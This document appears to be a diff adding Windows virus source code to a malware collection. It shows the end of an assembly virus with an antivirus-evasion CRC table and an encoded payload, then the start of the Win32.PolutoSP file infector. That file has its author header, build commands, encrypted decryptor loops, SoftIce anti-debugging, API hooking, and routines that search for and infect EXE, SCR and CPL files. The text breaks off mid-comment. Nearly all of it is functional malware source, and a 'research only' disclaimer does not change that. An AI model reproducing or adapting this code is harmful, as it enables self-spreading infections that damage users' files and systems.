097h, 0D3h + DB 094h, 0F0h, 07Ah, 071h, 070h, 092h, 02Ch, 0DFh + DB 0D2h, 0F2h, 004h, 0A0h, 04Ch, 0B1h, 0CAh, 031h + DB 070h, 02Fh, 00Ah, 099h, 0A2h, 010h, 047h, 007h + DB 0EAh, 005h, 033h, 020h, 009h, 054h, 081h, 011h + DB 078h, 045h, 080h, 020h, 022h, 099h, 0D5h, 0C1h + DB 010h, 048h, 002h, 050h, 020h, 009h, 06Ah, 090h + DB 020h, 021h, 06Ah, 030h, 031h, 006h, 00Ah, 0A0h + DB 059h, 00Ch, 023h, 04Eh, 070h, 029h, 02Ah, 0A2h + DB 01Eh, 0B7h, 0B4h, 028h, 069h, 00Ah, 0D0h, 01Fh + DB 047h, 079h, 004h, 097h, 05Ah, 060h, 04Ah, 0EFh + DB 084h, 033h, 088h, 095h, 08Fh, 01Fh, 062h, 0ECh + DB 09Ah, 055h, 072h, 0C4h, 070h, 071h, 020h, 04Ch + DB 010h, 0E6h, 0C9h, 0E8h, 05Eh, 06Eh, 072h, 0BDh + DB 001h, 075h, 0D6h, 0C0h, 000h + + Guarda_EIP DD 00000000h + FHandle DD 00000000h + MHandle DD 00000000h + BaseMap DD 00000000h + Tamao_1 DD 00000000h + Tamao_2 DD 00000000h + CRC_PLXR EQU 09EB7DF5h + + CRCNoInf DD 056B06AB2h + DD 0C4B3B3AEh + DD 09FAACC5Eh + DD 003E9FED8h + DD 071C0B944h + DD 0AEBB798Ch + DD 098BEBD89h + DD 0DA2CC2EBh + DD 0527EDB25h + DD 0EE9E3F8Bh + DD 0624D4378h + DD 00926128Ch + DD 0A6B26D55h + DD 0617F1F35h + DD 05AE2F365h + DD 085B3A1E3h + DD 05CE63D60h + DD 09EA8CB96h + DD 0A0AC0C6Dh + +; -- LA FOQUIDA TABLA -- COPYRIGHT (C) 2001 MONGOLITO ENTERPRISES +; "defr" 56B06AB2 +; "scan" C4B3B3AE +; "anti" 9FAACC5E +; "rund" 03E9FED8 +; "wscr" 71C0B944 +; "cscr" AEBB798C +; "drwa" 98BEBD89 +; "smar" DA2CC2EB +; "task" 527EDB25 +; "avpm" EE9E3F8B +; "avp3" 624D4378 +; "avpc" 0926128C +; "avwi" A6B26D55 +; "avco" 617F1F35 +; "vshw" 5AE2F365 +; "fp-w" 85B3A1E3 +; "f-st" 5CE63D60 +; "f-pr" 9EA8CB96 +; "f-ag" A0AC0C6D +; -- LA FOQUIDA TABLA -- COPYRIGHT (C) 2001 MONGOLITO ENTERPRISES + + IF DEBUG + Mascara DB "BAIT*.???", 00h + ELSE + Mascara DB "*.???", 00h + ENDIF + Busqueda DB SIZEOF_WIN32_FIND_DATA DUP (00h) + RewtDir DB MAX_PATH DUP (00h) + BHandle DD 00000000h + IF DEBUG + Puto_Puto DB ".", 00h + ELSE + Puto_Puto DB "..", 00h + ENDIF + LargPP DD 00000000h + CRC_EXE EQU 0F643C743h + CRC_SCR EQU 096C10707h + + TempAPI DB 25d DUP (00h) + ReSave DD 00000000h + PackedAPIs DB "X", 00h + DB "Create", 00h + DB "File", 00h + DB "Map", 00h + DB "View", 00h + DB "Close", 00h + DB "Get", 00h + DB "Set", 00h + DB "Find", 00h + DB "Virtual", 00h + DB "Window", 00h + DB "Directory", 00h + DB "Current", 00h + DB "WaitFor", 00h + DB "Thread", 00h + DB 0FFh + + PFHandle DD 00000000h + PTemporal DD 00000000h + CocoFrio DB "c:\cocofrio.com", 00h + Largo_CocoFrio EQU $-CocoFrio + AutoExec DB "c:\autoexec.bat", 00h + + Payload_Prog LABEL NEAR + + DB 081h, 0FCh, 0C5h, 005h, 077h, 002h, 0CDh, 020h + DB 0B9h, 037h, 002h, 0BEh, 037h, 003h, 0BFh, 065h + DB 005h, 0BBh, 000h, 080h, 0FDh, 0F3h, 0A4h, 0FCh + DB 087h, 0F7h, 083h, 0EEh, 0C6h, 019h, 0EDh, 057h + DB 057h, 0E9h, 0EDh, 003h, 055h, 050h, 058h, 021h + DB 00Bh, 001h, 004h, 008h, 0A7h, 0CBh, 0C1h, 082h + DB 0C6h, 0B5h, 090h, 039h, 000h, 004h, 0A8h, 001h + DB 006h, 0DDh, 0FFh, 0FFh, 0B4h, 02Ah, 0CDh, 021h + DB 088h, 016h, 080h, 003h, 080h, 0FEh, 007h, 076h + DB 019h, 033h, 0C0h, 08Ah, 0FEh, 0FFh, 0C6h, 0F6h + DB 0E6h, 033h, 0D2h, 0B3h, 005h, 0F6h, 0F3h, 002h + DB 0C2h, 02Ch, 004h, 03Ah, 006h, 092h, 0DFh, 018h + DB 074h, 019h, 0EBh, 06Bh, 090h, 091h, 067h, 003h + DB 004h, 0EFh, 0FFh, 075h, 054h, 0B8h, 012h, 000h + DB 0CDh, 010h, 0B4h, 00Bh, 0BBh, 00Eh, 006h, 0BFh + DB 0FDh, 002h, 033h, 0DBh, 0BAh, 000h, 009h, 008h + DB 0B3h, 039h, 0BEh, 095h, 001h, 0C7h, 0FEh, 0E8h + DB 003h, 070h, 0B3h, 028h, 0BEh, 0CAh, 007h, 024h + DB 0BEh, 0DFh, 0CCh, 016h, 003h, 042h, 0CDh, 016h + DB 0BEh, 054h, 09Bh, 0FBh, 003h, 0B3h, 01Eh, 0B8h + DB 003h, 02Eh, 061h, 0B4h, 0FFh, 0FFh, 00Eh, 0ACh + DB 00Ah, 0C0h, 074h, 010h, 0B9h, 038h, 000h, 051h + DB 0B9h, 0FFh, 0FFh, 0E2h, 0FEh, 059h, 0F6h, 0DBh + DB 0E2h, 0F7h, 016h, 0EBh, 0EBh, 0B8h, 000h, 04Ch + DB 090h, 013h, 0D9h, 020h, 000h, 0C4h, 0FEh, 037h + DB 03Ch, 020h, 050h, 04Ch, 045h, 058h, 041h, 052h + DB 020h, 03Eh, 0B6h, 0FDh, 00Dh, 00Dh, 00Ah, 001h + DB 000h, 028h, 06Fh, 057h, 02Eh, 000h, 06Dh, 061h + DB 073h, 0DFh, 0FEh, 020h, 065h, 06Eh, 074h, 072h + DB 065h, 074h, 005h, 069h, 064h, 06Fh, 020h, 06Eh + DB 0FFh, 071h, 075h, 065h, 020h, 075h, 06Eh, 020h + DB 070h, 016h, 065h, 06Fh, 07Eh, 0EBh, 018h, 020h + DB 019h, 061h, 063h, 074h, 06Fh, 072h, 0B2h, 0E6h + DB 029h, 041h, 038h, 0D8h, 096h, 01Bh, 070h, 033h + DB 0DFh, 01Eh, 06Ch, 061h, 004h, 061h, 064h, 065h + DB 063h, 0DFh, 0CAh, 06Fh, 020h, 03Bh, 06Dh, 062h + DB 065h, 06Ch, 0B9h, 0B7h, 06Ch, 00Ch, 069h, 06Dh + DB 069h, 05Fh, 0B6h, 0BDh, 012h, 075h, 072h, 062h + DB 01Eh, 06Fh, 047h, 023h, 06Ch, 088h, 0ACh, 0B5h + DB 06Ch, 02Ch, 050h, 04Fh, 06Dh, 0DBh, 04Bh, 020h + DB 047h, 06Eh, 05Dh, 0B7h, 03Dh, 065h, 003h, 061h + DB 04Fh, 06Ch, 008h, 0FBh, 020h, 067h, 06Fh, 063h + DB 068h, 03Fh, 06Dh, 0D8h, 040h, 061h, 093h, 06Dh + DB 041h, 061h, 091h, 061h, 0F7h, 076h, 0C6h, 069h + DB 06Ch, 03Dh, 04Bh, 0B1h, 076h, 074h, 075h, 066h + DB 020h, 03Eh, 00Eh, 061h, 080h, 079h, 020h, 0BDh + DB 0FDh, 041h, 062h, 06Fh, 084h, 076h, 061h, 072h + DB 06Eh, 0B6h, 073h, 06Eh, 045h, 078h, 07Fh, 0DBh + DB 073h, 06Fh, 0C9h, 072h, 00Fh, 06Dh, 065h, 073h + DB 0B2h, 0B3h, 06Dh, 081h, 000h, 043h, 0FFh, 0B7h + DB 04Dh, 028h, 063h, 029h, 020h, 032h, 030h, 030h + DB 02Fh, 0FFh, 031h, 020h, 04Ch, 069h, 074h, 065h + DB 053h, 079h, 02Fh, 02Fh, 020h, 01Eh, 0DCh, 048h + DB 065h, 0B6h, 049h, 056h, 0ADh, 0DDh, 003h, 065h + DB 07Ah, 051h, 08Fh, 0BBh, 0EDh, 02Eh, 000h, 048h + DB 068h, 074h, 09Ch, 072h, 06Fh, 015h, 00Eh, 018h + DB 01Fh, 0DAh, 0CDh, 09Dh, 07Ah, 06Eh, 064h, 002h + DB 005h, 0D7h, 034h, 05Dh, 0EEh, 0C3h, 009h, 0F9h + DB 004h, 0EDh, 00Ah, 07Bh, 0F7h, 059h, 0C3h, 000h + DB 000h, 040h, 0A8h, 000h, 000h, 000h, 000h, 020h + DB 001h, 0FFh, 0A4h, 0E8h, 034h, 000h, 072h, 0FAh + DB 041h, 0E8h, 029h, 000h, 0E3h, 035h, 073h, 0F9h + DB 083h, 0E9h, 003h, 072h, 006h, 088h, 0CCh, 0ACh + DB 0F7h, 0D0h, 095h, 031h, 0C9h, 0E8h, 015h, 000h + DB 011h, 0C9h, 075h, 008h, 041h, 0E8h, 00Dh, 000h + DB 073h, 0FBh, 041h, 041h, 041h, 08Dh, 003h, 096h + DB 0F3h, 0A4h, 096h, 0EBh, 0CEh, 0E8h, 002h, 000h + DB 011h, 0C9h, 001h, 0DBh, 075h, 004h, 0ADh, 011h + DB 0C0h, 093h, 0C3h, 05Eh, 0B9h, 003h, 000h, 0ACh + DB 02Ch, 0E8h, 03Ch, 001h, 077h, 0F9h, 0C1h, 004h + DB 008h, 029h, 034h, 0ADh, 0E2h, 0F1h, 0C3h + + Largo_PProg EQU $-Payload_Prog + + + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + DB 10h DUP (90h) + + Termina_Plexar LABEL NEAR + + Mentira PROC + + PUSH 0Ah ; lang_spanish + PUSH 040000h + 080000h + 010h ; mb_topmost & mb_right & mb_iconerror + PUSH OFFSET Titulo + PUSH OFFSET Mensaje + PUSH 0 + CALL MessageBoxExA + + PUSH 0 + CALL ExitProcess + + MENTIRA ENDP + +End Empieza_Plexar diff --git a/Win32/Win32.PolutoSP.asm b/Win32/Win32.PolutoSP.asm new file mode 100644 index 00000000..2fa0974d --- /dev/null +++ b/Win32/Win32.PolutoSP.asm @@ -0,0 +1,2327 @@ +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Name: Win32.PolutoSP (Version:2.0) * +;* Target: Portable Exe (PE), SCR, CPL * +;* Author: PiKaS lordjoker@hotmail.com * +;* Characteristics: * +;* Semi-Morfic Virus (uses 32 bit keys) * +;* Resident Per-Process (Hooks APIs like CreateFileA, etc...) * +;* Direct Action Virus (Windows, System and Actual Directories) * +;* Anti-Debugging (Jump if a Debug program is detected...SoftIce) * +;* CRC32 CheckSum File (Rebuild CRC32 of Infected Files) * +;* Detect SFC protected files and Installation Kits * +;* Payload: * +;* Graphic payload (one month later, if 31th: rare spots appear * +;* on the window and more...) * +;* Size: 6519 Bytes * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Author Notes: This Virus is dedicated to a dead friend * +;* Thanks to Dream Theater, Raphsody and Bind Guardian Music * +;* To Wintermute and BillyBel Tutes and Neuromancer Book ;) * +;* Sorry for my poor English :P * +;* To Build this: * +;* tasm32 -m7 -ml -q -zn P01UT0SP.asm * +;* tlink32 -Tpe -c -aa -v P01UT0SP ,,, import32 * +;* pewrsec P01UT0SP.exe * +;* InfMark P01UT0SP.exe /POLT * +;* (The Last is a program that put an Infection Mark 'POLT' * +;* in the Executable File) * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Disclaimer: * +;* This software is for research purposes only * +;* The author is not responsible for any problems caused due to * +;* improper or illegal usage of it * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +.486p ; let's rock +.model flat, stdcall + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Exported APIs for the Host * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +extrn MessageBoxA:proc ; A Message Box for 1st generation +extrn ExitProcess:proc + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Definition of constants * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +MAX_PATH equ 260 +TamInfo equ offset V_Info@2 - offset V_Info@1 ; Shit Size +TamVirus@1 equ offset V_FinalVirus - offset V_Virus ; Virus Encripted Size +TamVirus@2 equ offset V_FinalVirus - offset V_InicioVirus ; Total Size + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Definition of structures * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +FILETIME STRUC ; File's time +LowDateTime DD ? +HighDateTime DD ? +FILETIME ENDS + +WIN32_FIND_DATA STRUC ; FindFirst/NextFile Structure +Atributos DD ? +CreationTime FILETIME ? +LastAccessTime FILETIME ? +LastWriteTime FILETIME ? +FileSizeHigh DD ? +FileSizeLow DD ? +Reserved0 DD ? +Reserved1 DD ? +FileName DB MAX_PATH DUP (?) +AlternateFileName DB 13 DUP (?) + DB 3 DUP (?) +WIN32_FIND_DATA ENDS + +SYSTEMTIME STRUC ; System's time (to make some cool things!!) +Year DW ? +Mes DW ? +DiaSemana DW ? +Dia DW ? +Hora DW ? +Minutos DW ? +Segundos DW ? +Milisegundos DW ? +SYSTEMTIME ENDS + +MEMORY_BASIC_INFORMATION STRUC ; If we have to unprotect some memory space +BaseAddress DD ? ; This Structure inform about memory propieties +AllocationBase DD ? +AllocationProtect DD ? +RegionSize DD ? +State DD ? +Protect DD ? +lType DD ? +MEMORY_BASIC_INFORMATION ENDS + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Host Date Section * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +.data + +N_Titulo db 'Win32.PolutoSP',0 ; A Stupid Message Box text +N_Texto db 'Win32.PolutoSP X [*PiKaS*]LaBs',0 + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Host Code Section * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +.code + +V_InicioHost: ; A simple 1st generation host, only shows a xor eax,eax ; Message Box and finish program + push eax + push offset N_Titulo + push offset N_Texto + push eax + call MessageBoxA ; Hello... nock, nock...! + xor eax,eax + push eax + call ExitProcess ; Bye! + +V_Entrada: + call V_InicioVirus ; This is the Entry Point of Host (always in + ; code section) and call to the last section + ; where the Virus waits... + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Virus Start * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +V_InicioVirus: + pushad ; Is not importat, but I make it always + pushfd + mov ebp,00h ; Move the Delta Offset to ebp +V_Delta equ $-4 + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Virus Decriptor Start * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +V_Desencriptar: + not eax ; Some Shit Instructions... + mov ecx,00h ; The Virus have 8 decriptors and use each time + xor eax,ebx ; a ramdon 32 bit new key + sahf + mov edx,TamVirus@1 + push eax + pop ebx + or ax,bx + lea esi,[V_Virus+ebp] + and eax,ebx + stc +V_Bucle: + xor byte ptr[esi],cl ; Use SUB/XOR/ADD/ROL/ROR instructions + daa + neg ax + add byte ptr[esi],cl + lahf + dec ebx + inc esi ; Next byte to Decript + not eax + ror ecx,08h ; Ror the 32 Bits Key + inc ebx + inc eax + dec edx + jnz V_Bucle ; Here jump until the Virus Body is decripted + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* A rare way to get the actual ImageBase * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +V_Virus: + call Delta@1 +Delta@2: + mov esi,esp + lodsd ; Get the return address + jmp Delta@3 +Delta@1: + xor eax,eax + jz Delta@2 +Delta@3: + add esp,04h + sub eax,offset Delta@2 - offset V_InicioVirus ; The Base of Virus Code + sub eax,00001000h + offset V_InicioVirus - offset V_InicioHost ; HardCoded in +V_RvaVirus equ $-4 ; 1st generation + mov [H_ImageBase+ebp],eax ; We have the ImageBase + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Virus Body Start * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + + call GetKernelAddress ; Obtain the Kernel Base Address + or eax,eax ; If Error -> go to Host + jz V_VirusError + call GetApiAddress ; Get All the APIs we need + or eax,eax ; If Error -> go to Host + jz V_VirusError + call AntiDebugging ; Check for Debuggers + or eax,eax ; If a Debugger is present -> go out now + jz V_VirusError + call IniciarSemilla ; Make a new random 32 bit number (for RNG) + call LoadSfcProtected ; Check if SFC.dll is present in System + call RuntimeVirus ; Just Find Target Files (Direct Action Part) + or ebp,ebp ; If 1st generation -> go to Host + jz V_VirusError + call SetAllHooks ; Set Hooks in ImportTable for Resident Part + call PayloadVirus ; Is time to rock!!...hahaha + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Return Control to Host * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +V_VirusError: + call SetReEntrada ; Set up Re-Entry (Need in CPLs Files) +V_VueltaHost: + mov eax,[H_ImageBase+ebp] ; Get Real Host Entry Point + add eax,00001000h ; HardCoded RVA Host and put it on stack +V_RvaHost equ $-4 + mov [esp+24h],eax + popfd ; Recuperate initial registers values and jump + popad ; to the Host Entry Point + ret + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function: Align Values * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +AlinearCifra proc + push edx ; Save some registers + push ecx + mov ecx,[H_Alineamiento+ebp] ; Take the Align factor + xor edx,edx + push eax + div ecx ; Align with it the eax value + pop eax + sub ecx,edx + add eax,ecx ; And we have the Aligned Value in eax + pop ecx + pop edx + ret +AlinearCifra endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Virus Function Anti-Debuggers * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +AntiDebugging proc + lea eax,[N_IsDebuggerPresent+ebp] ; Check for IsDebuggerPresent API + push eax + mov eax,[@_KernelAddress+ebp] + push eax + call [@_GetProcAddress+ebp] + or eax,eax + jz NoDebuggerPresent@1 ; If don't have the API... go out! + call eax ; Is a Debbuger Present... yes! hoho + or eax,eax + jnz DebuggerPresent@1 +NoDebuggerPresent@1: + lea esi,[N_Sice+ebp] ; Check for SoftIce in Win9x + call CreateFile ; Create the Debugger + inc eax + jz NoDebuggerPresent@2 + dec eax ; Hummm... SoftIce win9x is present! + call CloseHandleB + jmp DebuggerPresent@1 +NoDebuggerPresent@2: ; Check for SoftIce in WinNt + lea esi,[N_Nice+ebp] + call CreateFile + inc eax + jz NoDebuggerPresent@3 + dec eax ; Hummm... SoftIce winNT is present! + call CloseHandleB +DebuggerPresent@1: + xor eax,eax ; If zero returned -> Debugger Present + ret +NoDebuggerPresent@3: + xor eax,eax ; If non zero returned -> Debugger no Present + inc eax + ret +AntiDebugging endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Check possible Hosts * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +ArchivoOk proc + push edi ; Save some registers + push esi + mov eax,[DatosArchivo.FileSizeLow+ebp] ; Use Size-Padding to detect infected + mov ecx,75h ; files (Size -> 75h) + xor edx,edx + div ecx + or edx,edx + jz ArchivoOkError@1 + mov eax,[DatosArchivo.Atributos+ebp] ; If is a System or a Directory or a + and eax,0814h ; compressed File... don't touch + jnz ArchivoOkError@1 + lea esi,[DatosArchivo.FileName+ebp] + call SfcIsFileProtected ; Check if the File is SFC protected + or eax,eax + jnz ArchivoOkError@1 + call CreateFile ; Create and Open the File + inc eax ; saving attributes and Date + jz ArchivoOkError@1 + dec eax + mov [H_HandleOpen+ebp],eax ; Save the Handle + mov ebx,eax + mov edi,[DatosArchivo.FileSizeLow+ebp] + mov esi,[DatosArchivo.FileSizeHigh+ebp] + cmp edi,4000h ; Avoid to infect little and huge + jb ArchivoOkError@2 ; files... well + cmp edi,03E80000h + jg ArchivoOkError@2 + call FileMapping ; Make a File Mapping + or eax,eax + jz ArchivoOkError@2 + mov [H_HandleMapa+ebp],eax ; And save the handle of map + mov ebx,eax + call MapViewFile ; And finally create a map view of File + or eax,eax + jz ArchivoOkError@3 + mov [@_DirArchivo+ebp],eax ; Save the mapping address + mov edi,eax + mov ax,[edi] + cmp ax,'ZM' ; Check for Dos Signature + jnz ArchivoOkError@4 + mov ax,[edi+18h] + cmp ax,40h ; Is a Dos Exe or a New Exe? + jnz ArchivoOkError@4 + mov eax,[edi+3Ch] + add edi,eax + mov ax,[edi] ; Is a Portable Exe? + cmp ax,'EP' + jnz ArchivoOkError@4 + mov eax,[edi+08h] + cmp eax,'POLT' ; Have been infected yet? + jz ArchivoOkError@4 + mov ax,[edi+06h] + cmp ax,03h ; At least 3 sections + jc ArchivoOkError@4 + mov ax,[edi+14h] + or ax,ax ; With Optional Header + jz ArchivoOkError@4 + mov ax,[edi+16h] + and ax,0002h ; Check for Executable + jz ArchivoOkError@4 + mov eax,[edi+2Ch] + or eax,eax ; Avoid Dlls with zero code size + jz ArchivoOkError@4 + mov ax,[edi+04h] + cmp ax,014Ch ; Only Intel386 + jnz ArchivoOkError@4 + mov ax,[edi+5Ch] + dec ax ; SubSystem Windows GUI + dec ax + jz ArchivoOk@1 +ArchivoOkError@4: ; If we have an Error... just Unmap + mov ebx,[@_DirArchivo+ebp] ; and CloseHandle + call UnmapFile +ArchivoOkError@3: + mov eax,[H_HandleMapa+ebp] + call CloseHandleA +ArchivoOkError@2: + mov eax,[H_HandleOpen+ebp] + call CloseHandleB +ArchivoOkError@1: + pop esi + pop edi + xor eax,eax ; Return zero -> Bad File + ret +ArchivoOk@1: ; File is Ok, before infect it we + mov ecx,[edi+3Ch] ; take some values like File Alignment + mov [H_Alineamiento+ebp],ecx + mov ebx,[@_DirArchivo+ebp] + call UnmapFile + mov eax,[H_HandleMapa+ebp] + call CloseHandleA + pop esi + pop edi + xor eax,eax ; Return a non zero value -> File Ok + inc eax + ret +ArchivoOk endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Search and Infection Virus Routines * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +BuscarArchivos proc + lea esi,[V_Mascara@1+ebp] ; We want Exe, Scr and Cpl Files Now!! + mov edi,03h ; 3 Exe Files Counter +BuscarOtro@4: + lea eax,[DatosArchivo+ebp] ; Push some pointers and values... + push eax + mov eax,esi + push eax + call [@_FindFirstFileA+ebp] ; And call FindFirstFileA API + inc eax + jz BuscarArchivoError@2 ; No more Files? Ok... see ya! + dec eax + mov [H_HandleArchivo+ebp],eax +BuscarOtro@1: + call ArchivoOk ; Is File Ok to Infect? + or eax,eax + jz BuscarOtro@2 ; No?... well, I want more + call InfectarArchivo ; Yes?... whahaha... Infect It Now! + or eax,eax + jz BuscarOtro@2 + dec edi ; If File Infection is success decrement counter + jz BuscarArchivoError@1 +BuscarOtro@2: + lea eax,[DatosArchivo+ebp] ; Push some pointers and values again + push eax + mov eax,[H_HandleArchivo+ebp] + push eax + call [@_FindNextFileA+ebp] ; Give me more Files + or eax,eax + jnz BuscarOtro@1 ; If more Files are found... repeat process +BuscarArchivoError@1: + mov eax,[H_HandleArchivo+ebp] + push eax + call [@_FindClose+ebp] ; Close Actual File Search +BuscarArchivoError@2: + mov edi,esi ; Change the actual Target (Exe, Scr or Cpl) + xor eax,eax ; and repeat process again +BuscarOtro@5: + scasb + jnz BuscarOtro@5 + mov esi,edi + mov al,[edi] + xor edi,edi + inc edi + cmp al,0BBh + jnz BuscarOtro@4 ; If no more Targets... bye! + ret +BuscarArchivos endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Check the Entry Point * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +CheckEntryPoint proc + push edi ; Save some registers + push esi + mov edx,eax ; We have in eax the Image Base and want to + push eax ; find the Image Section Header + add edx,[edx+3Ch] + mov esi,edx + add esi,18h + movzx ebx,word ptr[edx+14h] + add esi,ebx + movzx ecx,word ptr[edx+06h] + mov edi,esi + mov eax,[edx+28h] ; Put in eax the Real Entry Point +CheckEntry@1: + mov ebx,[edi+0Ch] ; Check for the Code Section (the Section that + cmp eax,ebx ; is pointed by the Entry Point) + jc CheckEntry@2 + add ebx,[edi+10h] + cmp eax,ebx + jnc CheckEntry@2 + mov esi,edi + jmp CheckEntry@3 ; Humm... here is it! take note +CheckEntry@2: + add edi,28h + loop CheckEntry@1 + jmp CheckError@1 ; If no Code Section is found... grrr... Error +CheckEntry@3: + mov ebx,[esi+10h] ; We have the Code Section Header... Let's + mov ecx,[esi+08h] ; save some values + cmp ecx,ebx + jnc CheckError@1 + sub ebx,ecx + cmp ebx,06h ; Have 6 bytes free to put some instructions? + jc CheckError@1 + pop eax + mov ebx,ecx + add ecx,[esi+14h] ; Well, some Rva and Raw plus the address + add ebx,[esi+0Ch] ; of mapping File... for later actions + add ecx,eax + mov edx,esi + pop esi + pop edi + ret +CheckError@1: + xor ecx,ecx ; If error -> return a zero value + pop eax + pop esi + pop edi + ret +CheckEntryPoint endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to calculate the File CheckSum * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +CheckSumMappedFile proc + push esi ; Save some registers + push ebx + push ecx + inc ecx + shr ecx,01h ; Is a Revised version of CheckSumMappedFile API + call ParcialCheckSum ; Call to make the partial CheckSum + add esi,[esi+3Ch] + mov bx,ax ; We have to make some changes after and... + xor edx,edx + inc edx + mov ecx,edx + mov ax,[esi+58h] + cmp bx,ax + adc ecx,-01h + sub bx,cx + sub bx,ax + mov ax,[esi+5Ah] + cmp bx,ax + adc edx,-01h + sub bx,dx + sub bx,ax + xor eax,eax + mov ax,bx + pop ecx + add eax,ecx + mov [esi+58h],eax ; Here is the CRC File CheckSum in eax + pop ebx ; Restore register and finish + pop esi + ret +CheckSumMappedFile endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Validate the File CheckSum * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +CheckSumValido proc + push esi + add esi,[esi+3Ch] ; Just Look if the File CheckSum is different + mov eax,[esi+58h] ; to Zero (no CheckSum is used if Zero) + pop esi + ret +CheckSumValido endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* 